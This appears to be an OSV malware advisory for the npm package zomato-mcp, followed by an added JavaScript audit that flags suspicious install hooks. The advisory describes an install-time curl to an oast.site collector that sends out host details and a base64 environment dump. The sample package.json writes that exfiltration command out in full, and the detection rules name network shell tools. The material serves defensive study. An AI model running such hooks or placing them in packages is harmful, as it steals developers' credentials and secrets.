npm

zomato-mcp@1.0.0

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-6270

Ecosystem

npm

Summary

On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/<base64(zomato-mcp)>, carrying the output of hostname -f, whoami, the current working directory, and a base64-encoded dump of the entire process environment (env | base64 -w0). This fires automatically, with no user consent, over plain HTTP. A preuninstall hook similarly leaks the hostname. The oast.site domain is an Interactsh out-of-band collector, used to receive arbitrary attacker-controlled callbacks. The package's advertised functionality is absent: index.js is a 59-byte stub (module.exports = { name: 'zomato-mcp', version: '1.0.0' };) with no MCP server implementation. Combined with the Zomato-namespace impersonation, this is a dependency-confusion / typosquat attack whose only real behavior is install-time reconnaissance and exfiltration of the entire shell environment, which routinely contains API tokens, CI secrets, cloud credentials, and registry auth tokens.

Source: amazon-inspector (a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e)
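Added example, not part of the OSV record or of any scanner: a heuristic audit of package.json lifecycle hooks that flags the pattern described above (a network client in a preinstall/preuninstall hook, an out-of-band collector domain, host reconnaissance and a base64-encoded environment dump). The function names auditLifecycleScripts and severity are assumptions, and the sample package.json is constructed to mirror the report with the collector subdomain replaced by the placeholder EXAMPLE-ID.

```javascript
// Hooks npm runs without the user invoking them explicitly.
const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall',
  'preuninstall', 'uninstall', 'postuninstall', 'prepare',
];

// Heuristic rules matched against each hook's shell command (assumed set, not exhaustive).
const RULES = [
  { name: 'network-client', re: /\b(curl|wget|nc|ncat)\b/ },
  { name: 'plain-http',     re: /http:\/\//i },
  { name: 'oast-callback',  re: /\.(oast\.site|oast\.fun|interact\.sh)\b/i },
  { name: 'env-dump',       re: /(^|[\s(;&|])(env|printenv)\b|process\.env\b/ },
  { name: 'base64-encode',  re: /\bbase64\b|btoa\(/ },
  { name: 'host-recon',     re: /\b(hostname|whoami|pwd)\b/ },
];

// Returns one finding per lifecycle hook whose command trips at least one rule.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== 'string') continue;
    const hits = RULES.filter(r => r.re.test(cmd)).map(r => r.name);
    if (hits.length) findings.push({ hook, hits, command: cmd });
  }
  return findings;
}

// A network client combined with an environment dump or an OAST collector is the
// exfiltration shape from the report; a client or recon alone is only suspicious.
function severity(findings) {
  const all = new Set(findings.flatMap(f => f.hits));
  if (all.has('network-client') && (all.has('env-dump') || all.has('oast-callback'))) return 'high';
  if (all.has('network-client') || all.has('host-recon')) return 'medium';
  return findings.length ? 'low' : 'none';
}

// Constructed package.json modelled on MAL-2026-6270; EXAMPLE-ID is a placeholder host label.
const SUSPECT_PKG = {
  name: 'zomato-mcp', version: '1.0.0', main: 'index.js',
  scripts: {
    preinstall: 'curl -s "http://EXAMPLE-ID.oast.site/install/$(echo zomato-mcp | base64)?h=$(hostname -f)&u=$(whoami)&d=$(pwd)&e=$(env | base64 -w0)"',
    preuninstall: 'curl -s "http://EXAMPLE-ID.oast.site/uninstall?h=$(hostname -f)"',
  },
};
// Constructed benign package for comparison: a local build step and a test runner.
const BENIGN_PKG = { name: 'some-lib', scripts: { postinstall: 'node scripts/build.js', test: 'jest' } };

console.log(severity(auditLifecycleScripts(SUSPECT_PKG)), severity(auditLifecycleScripts(BENIGN_PKG)));
```

Running the audit over every package.json under node_modules after an install with --ignore-scripts lets the hooks be reviewed before they are allowed to execute.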
